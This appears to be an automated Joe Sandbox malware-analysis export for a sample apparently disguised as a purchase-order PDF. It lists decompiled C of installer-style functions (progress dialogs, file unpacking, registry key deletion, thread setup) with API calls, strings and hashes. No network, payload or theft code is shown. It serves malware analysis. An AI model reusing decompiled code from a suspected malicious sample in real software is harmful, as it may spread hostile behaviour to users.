				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(?,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001A27 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10001A27(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E10001CD9(_t3);
				if(E10002B64() != 0) {
					_t6 = E1000266E(_t5, E10001787);
					 *0x1000b120 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10002720(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10001A9D();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10002698(_t9,  *0x1000b120, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000197B(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10001A9D();
					return 0;
				}
			}

0x10001a27
0x10001a33
0x10001a42
0x10001a48
0x10001a4d
0x10001a50
0x00000000
0x10001a52
0x10001a5f
0x10001a63
0x10001a65
0x10001a94
0x10001a94
0x10001a99
0x10001a9c
0x10001a67
0x10001a75
0x10001a77
0x00000000
0x10001a79
0x10001a79
0x10001a7b
0x10001a7c
0x10001a83
0x10001a89
0x10001a8d
0x10001a91
0x10001a93
0x10001a93
0x10001a77
0x10001a65
0x10001a35
0x10001a35
0x10001a35
0x10001a3c
0x10001a3c

APIs

__init_pointers.LIBCMT ref: 10001A27

Part of subcall function 10001CD9: EncodePointer.KERNEL32(00000000,00000001,10001A2C,10001375,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001CDC
Part of subcall function 10001CD9: __initp_misc_winsig.LIBCMT ref: 10001CFD

__mtinitlocks.LIBCMT ref: 10001A2C

Part of subcall function 10002B64: InitializeCriticalSectionAndSpinCount.KERNEL32(1000B170,00000FA0,?,00000001,10001A31,10001375,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?), ref: 10002B82

__mtterm.LIBCMT ref: 10001A35

Part of subcall function 10001A9D: DeleteCriticalSection.KERNEL32(?,?,?,?,1000143A,10001420,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?), ref: 10002A80
Part of subcall function 10001A9D: _free.LIBCMT ref: 10002A87
Part of subcall function 10001A9D: DeleteCriticalSection.KERNEL32(1000B170,?,?,1000143A,10001420,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001), ref: 10002AA9

__calloc_crt.LIBCMT ref: 10001A5A
__initptd.LIBCMT ref: 10001A7C
GetCurrentThreadId.KERNEL32 ref: 10001A83

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 757573777-0
Opcode ID: eee08c123813ed375673096de278900043bd5bbe63372562791081fcaecc5a76
Instruction ID: 167a44c3eb285a27de619ecd111d5b11403e9c8c3d6e6aebd94708191778ac37
Opcode Fuzzy Hash: eee08c123813ed375673096de278900043bd5bbe63372562791081fcaecc5a76
Instruction Fuzzy Hash: DCF0593A20A72319F254EB747C0B6DA37D4CF036F0B200719F0A5D60DDFF21A4814166

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1000454D Relevance: 7.6, APIs: 5, Instructions: 67
